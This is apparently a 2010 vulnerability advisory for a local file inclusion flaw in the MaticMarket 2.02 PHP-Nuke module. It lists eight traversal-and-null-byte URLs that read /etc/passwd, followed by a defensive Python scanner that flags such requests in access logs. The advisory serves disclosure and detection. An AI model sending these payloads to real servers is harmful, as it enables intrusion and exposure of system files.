# Title : MaticMarket 2.02 for PHP Nuke LFI Vulnerability
# Published : 2010-12-20
# Author : xer0x
#MaticMarket 2.02 for PHP Nuke LFI Vulnerability
#Url: http://sourceforge.net/projects/maticmarket
#Author: xer0x
#Expl:
http://localhost/modules/maticmarket/deco/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/deco/blanc/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/blanc/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/default/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/default/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/gold/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/gold/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
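
A defender-side check for the requests listed above, as an added example that is not part of the original advisory: it scans web access logs for requests to the module's haut.php / bas.php scripts whose modulename parameter carries parent-directory sequences or a null byte. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Scripts named in the advisory: haut.php / bas.php under the module directory.
TARGET = re.compile(r"^/modules/maticmarket/(?:[^/]+/)*(?:haut|bas)\.php$", re.I)
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Dec/2010:10:00:00 +0000] "GET /modules/maticmarket/deco/blanc/haut.php?modulename=../../../../etc/passwd%00 HTTP/1.1" 200 1432',
    '192.0.2.11 - - [20/Dec/2010:10:00:05 +0000] "GET /modules/maticmarket/deco/blanc/bas.php?modulename=maticmarket HTTP/1.1" 200 512',
    '192.0.2.12 - - [20/Dec/2010:10:00:09 +0000] "GET /modules/maticmarket/bleu/gold/bas.php?modulename=%252e%252e%252fconfig HTTP/1.1" 200 90',
    '192.0.2.13 - - [20/Dec/2010:10:00:12 +0000] "GET /index.php?modulename=../x HTTP/1.1" 200 10',
]

def suspicious_modulename(value):
    """Return the reasons a modulename value looks like a traversal attempt."""
    for _ in range(3):  # decode repeatedly so double-encoded input is caught
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    reasons = []
    if "\x00" in value:
        reasons.append("null byte")
    if re.search(r"(?:^|[\\/])\.\.(?:[\\/]|$)", value):
        reasons.append("parent-directory sequence")
    return reasons

def scan(lines):
    """Return (line_number, path, reasons) for each flagged request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not TARGET.match(unquote(url.path)):
            continue
        # parse_qs already applies one round of percent-decoding to each value.
        for value in parse_qs(url.query, keep_blank_values=True).get("modulename", []):
            reasons = suspicious_modulename(value)
            if reasons:
                hits.append((n, url.path, reasons))
    return hits

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```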